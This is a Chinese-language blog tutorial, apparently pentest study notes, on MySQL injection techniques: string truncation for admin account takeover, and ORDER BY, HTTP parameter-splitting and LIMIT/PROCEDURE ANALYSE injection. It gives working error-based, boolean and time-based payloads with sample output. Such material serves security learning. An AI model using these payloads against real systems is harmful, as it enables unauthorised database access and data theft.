mysql注入之长字符截断、orderby注入、HTTP分割注入、limit注入

于 2022-02-23 14:54:43 发布
阅读量5.9k 收藏 4
点赞数
分类专栏: # SQL注入 文章标签: mysql 渗透测试 经验分享 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Thunderclap_/article/details/123079014
版权

长字符截断/SQL约束攻击

  • 产生原因:在mysql中的一个设置里有一个sql_mode选项,当sql_mode设置为default时,即没有开启STRICT_ALL_TABLES选项时(MySQL默认 sql_mode为default),MySQL对插入超长的值只会提示warning,而不是error,这样就会导致一些截断问题。 

例如

  • 一个表的username字段类型为varchar(7) 长度最多7个字符。那么我们插入的时候将字符提高到8字符以上,它只取前7位,并且会弹出warning。

利用漏洞:

  • 假设管理员的登录名为admin,那么我们可以注册一个“admin        ”后面有八个空格用户即可轻易进入后台管理界面。

order by rand(True)   /order by rand(False)盲注

  • 产生原因:原语句类似为$id=$_GET['sort'];     select * from users order by $id ;

  • 利用漏洞:

    • 报错注入?sort=1 and updatexml(1,if(1=1,concat(0x7e,version()),2),1)
    • 盲注 order by rand(True)和order by rand(False)的结果排序是不同的,可以根据这个不同来进行盲注。
  • 例如:
    • 布尔盲注:?sort= rand(database()='ujcms')             
      • 返回了True的排序,说明database()='ujcms'是正确的值

  • 时间盲注 ?sort=if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(2)))test))
    • 执行结果睡眠2秒

 HTTP分割注入

场景:参数为username&password,查询语句为  select xxx from xxx where username='xxx' and password ='xxx';但是username参数过滤了注释符,无法将后面的注释掉,则可尝试用内联注释把password注释掉,凑成一条新语句后注释或闭合掉后面的语句:

当然这种注入的前提是单引号没有被过滤

  • payload:username=1' or extractvalue /*'&password=1*/ (1,concat(0x7e,(select database()),0x7e))) or'

  • 则查询语句为select * from users where username='1' or extractvalue /*' and password='1*/ (1,concat(0x7e,(select database()),0x7e)) or'';

过滤了空格,union,#,—+,/*,^,or,|

  • 可以考虑将password作为函数的参数来闭合语句:

  • payload:username=admin' and(strcmp(&password=,'asdasdasdasdasdasd')) and '1

  • 则查询语句为select * from users where username='admin' and(strcmp(' and password=','asdasdasdasdasdasd')) and '1';

    • strcmp比较,二者不一致返回True,一致返回False,而MySQL会将’1’判断为数字1,即True,因此该查询语句结果为True

limit注入

一般实际过程中使用 limit 时,大概有两种情况,一种使用order by,一种就是不使用 order by关键字

不存在 order by 关键字

  • 执行语句 select id from users limit 0,1; 

  • 这种情况下的 limit 后面可以使用union进行联合查询注入

  • 执行语句 select id from users limit 0,1 union select username from users;

 

存在 order by 关键字

  • 此方法适用于5.0.0< MySQL <5.6.6版本,在limit语句后面的注入

  • limit 关键字后面还可跟PROCEDURE和 INTO两个关键字,但是 INTO 后面写入文件需要知道绝对路径以及写入shell的权限,因此利用比较难,因此这里以PROCEDURE为例进行注入

  • 使用 PROCEDURE函数进行注入,ANALYSE支持两个参数,首先尝试一下默认两个参数

mysql> select id from users order by id desc limit 0,1 procedure analyse(1,1);

ERROR 1386 (HY000): Can't use ORDER clause with this procedure

  • 报错,尝试一下对其中一个参数进行注入,这里首先尝试报错注入

mysql> select id from users order by id desc limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);

ERROR 1105 (HY000): XPATH syntax error: ':5.5.53'

  • 不存在回显怎么办,延迟注入呀,如果 select version(); 第一个为5,则多次执行sha(1)达到延迟效果,这里不支持使用 sleep,所以需要使用BENCHMARK进行替代 

mysql> select id from users order by id desc limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1)))),1);
ERROR 1105 (HY000): XPATH syntax error: ':0'

Thunderclap_
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
MySQL 及 SQL 注入
12-16
MySQL 及 SQL 注入 如果您通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么就有可能发生SQL注入安全的问题。 本章节将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL中注入字符。 所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 我们永远不要信任用户的输入,我们必须认定用户输入的数据都是不安全的,我们都需要对用户输入的数据进行过滤处理。 以下实例中,输入的用户名必须为字母、数字及下划线的组合,且用户名长度为 8 到 20 个字符之间: if (preg_match("/^w{8
SQL注入漏洞原理及防御(I春秋在线实验室,保存笔记)
weixin_30297281的博客
07-06 891
实验环境 漏洞介绍 认识SQL注入漏洞 SQL注入漏洞可以说是在企业运营中会遇到的最具破坏性的漏洞之一,它也是目前被利用得最多的漏洞。 要学会如何防御SQL注入,我们首先要对他的原理进行了解。 SQL注入(SQLInjection)是这样一种漏洞:当我们的Web app在向后台数据库传递SQL语句进行数据库操作时。 如果对用户输入的参...
MYSQL字符截断
weixin_50464560的博客
03-03 1376
本人freebuf文章:https://www.freebuf.com/vuls/264586.html MYSQL字符截断 即使没有任何注入漏洞,攻击者也可能登录到后台管理页面 1、相关资料 2、sql-mode的各项设置 MySQL5.0以上版本支持三种sql_mode模式:ANSI、TRADITIONAL和STRICT_TRANS_TABLES。 1、ANSI模式:宽松模式,更改语法和行为,使其更符合标准SQL。对插入数据进行校验,如果不符合定义类型或长度,对数据类型调整或截断保存,报warni
SQL注入(宽字节注入、长字符截断
qq_28786023的博客
10-05 2963
本文仅记录SQL注入漏洞学习过程中的基本知识。 SQL注入漏洞是完全可以避免的安全问题。从其形成原因来看,就是**用户输入的数据(可能带有恶意)被SQL解释器当作代码执行,**从而获得更多数据库的信息或者获得更高的权限。从原理上来说,SQL注入可以分为两大类,数字型注入字符串型注入;(《web安全深度剖析 张炳帅》)。 数字型注入 即输入类型为int类型,如ID,年龄,页码等。一般来说,数字型注入只存在于弱类型语句中,如:PHP,ASP,python,而对于C,java等强类型语言则不存在。弱类型语言会自
超长字符截断注入
aiquan9342的博客
02-11 237
注入方法也是昨天看到某技术交流群聊到,闻所未闻便想要学习了,今天看某微信公众号的时候又再次看到关于”长字符截断注入“的文章. 但是经过一番了解,其实这个注入姿势很难找到了,因为它需要满足以下条件。   1.可以注册用户,而且可以注册带有空格的用户   2.你需要知道管理员的账号 看下面CODE mysql> create table test( -&...
利用mysql对特殊字符和超长字符会进行截断的特性 进行存储型XSS攻击——WordPress <4.1.2 & <=4.2 存储型xss...
weixin_34144848的博客
07-31 358
转自:Baidu Security Lab Xteam http://xteam.baidu.com/?p=177 漏洞概述 本次漏洞出现两个使用不同方式截断来实现的存储型xss,一种为特殊字符截断,一种为数据库字段长度截断,该漏洞导致攻击者可获取用户 cookie以及模拟浏览器正常操作,并且当管理员访问到注入的payload时,结合wordpress后台功能甚至可以getshell。   ...
截断注入
gl620321的博客
08-11 1111
一、截断注入 1.SQL攻击(SQL injection),简称注入攻击,是发生于应用程序之间数据库层的安全漏洞。 2.简而言之,是在输入的字符串之中注入SQL指令,在设计不良的程序之中忽略了检查,那么这些注入进去的指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破坏。 因为字符注入一般都带有单引号(‘),构造诸如攻击需要闭合单引号 或者双条件查询的情况下转义一个单引号,这个时候就...
MySQL注入攻击与防御
02-25
like,mod(),...)字符串的猜解操作(mid(),left(),rpad(),…)字符串生成操作(0x61,hex(),conv()(使用conv([10-36],10,36)可以实现所有字符的表示))可以用以下语句对一个可能的注入点进行测试以下是Mysql中可以用到的...
PHP+MYSQL 注入靶场
最新发布
04-26
里面有相关源码,参照源码去理解漏洞会更深刻,靶场中有SQL字符注入,SQL盲注,提供给大家进行练习使用。
MySQL注入绕开过滤的技巧总结
09-09
主要介绍了关于MySQL注入时绕开过滤的技巧,文中通过图文与示例代码介绍的很详细,需要的朋友可以参考借鉴,下面来一起看看吧。
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
通过 HTTP 头进行 SQL 注入
xiaoshan812613234的专栏
08-14 710
在漏洞评估和渗透测试中,确定目标应用程序的输入向量是第一步。这篇文章解释了别人是如何通过HTTP头部对你的数据库进行SQL注入攻击的,以及讨论下选择哪种漏洞扫描器测试SQL注入。 在漏洞评估和渗透测试中,确定目标应用程序的输入向量是第一步。有时,当做web应用程序测试时,SQL注入漏洞的测试用例通常局限于特殊的输入向量GET和POST变量。那么对于其他的HTTP头部参数呢?难道他们不是潜在的SQ
数据库应用常见问题——MySQL字符串截取
jinxlzc的博客
04-11 472
在很多时候数据库的表中的某一字段会存有多个信息,有的是按照指定的分隔符隔开,有的是按照不同的位置进行划分,那么有的时候就不得不将该字段的每条记录做选择性截取或是分割成多个字段,这一步骤可以在业务逻辑层中完成,也使用SQL存储过程里完成,这里我要说的就是存储过程中的字符串截取 先准备如下的数据表以备实验: 1.左右截取 1.1left(str, length) 截取字符串从左起的n位,比...
字符注入
m0_37923208的博客
09-26 387
字符注入gbk是一种多字符编码,通常来说,一个gbk编码汉字,占用2个字节。一个utf-8编码的汉字,占用3个字节。PHP在开启magic_quotes_gpc或者使用addslashes、iconv等函数的时候,单引号(’)会被转义成\’。比如字符%bf在满足上述条件的情况下会变成%bf\’。其中反斜杠(\)的十六进制编码是%5C,单引号(’)的十六进制编码是%27,那么就可以得出%bf \’=
mysql 查询字段被截断_(SqlServe)关于字符串长度被截断的问题
weixin_29157493的博客
01-19 2085
1. 问题描述在同步数据时常常会发现一个错误:将截断字符串或二进制数据。2. 问题原因这个问题出现的原因是:要插入的数值字段的长度超出了数据库中字段的长度。比如:插入的字符串字节长度是40,数据库中字段长度设置为了varchar(36)就会报此错误。3.问题扩展a. 如何计算字符串长度和字节长度,既:datalength和len区别。len:返回字符串的长度datalength:返回字符串的字节长...
mysql注入limit 注入
Sp4rkW的博客
03-05 4154
limit注入基本常见的分两种场景,存在`order by`与否,本文将复现尝试各种limit注入的姿势与讨论不同mysql版本对注入payload的影响。作者能力有限,有更多思路欢迎讨论~
sql注入
frutrue的博客
10-26 953
简单的sql注入笔记: 一、sql注入 sql注入(sql injection)被称为sql数据库结构化查询,是由于程序员在编写代码时的不严谨所造成的漏洞,它能让外部人员通过sql语句,查询到数据库的重要内容,容易造成数据泄露,隐私文件被读取,财产损失等。 sql注入条件: 1.参数用户可控:前端传给后端的参数用户可控。 2.参数带入数据库查询:传入的参数拼接到SQL语句中,且带入数据库中查询 只要存在着两个条件,就有可能产生sql注入漏洞。现在市面上的数据库类型有Access,mysql,mssql,P
sql-lab关于limit注入(网络信息安全实验室 第四题)
weixin_43803070的博客
04-27 1954
关于limit注入(记一次sql注入) 1.函数解释 MySQL 5.1.5版本中添加了对XML文档进行查询和修改的函数,分别是ExtractValue()和UpdateXML() 1)extractvalue():从目标XML中返回包含所查询值的字符串。   EXTRACTVALUE (XML_document, XPath_string);   第一个参数:XML_document是Str...
mysql手工注入语句_mysql手工注入学习笔记
weixin_34585343的博客
01-19 215
less-1(普通字符型)加’可知可能是字符注入用and来确认说明存在注入order by查询字段数存在3个字段union select查询在页面中显示的位置查询数据库查询表查字段查内容less2(普通数值型)数字型的less3(带括号字符型)使用’可知可能是拼接型的字符注入使用and判断确定是注入order by查询字段数less4(带括号双引号字符型)使用’以及数值型无法判断,使用%81...
sql手工注入漏洞测试(mysql数据库-字符型)
06-28
在针对MySQL数据库的字符注入测试中,攻击者会尝试利用输入表单中的字符型数据来破坏SQL语句的可靠性,进而获取对数据库的访问权限。 攻击者通常会使用一些SQL注入工具,例如SQLMap、Havij等,通过模拟输入表单来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Thunderclap_

点赞、关注加收藏~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值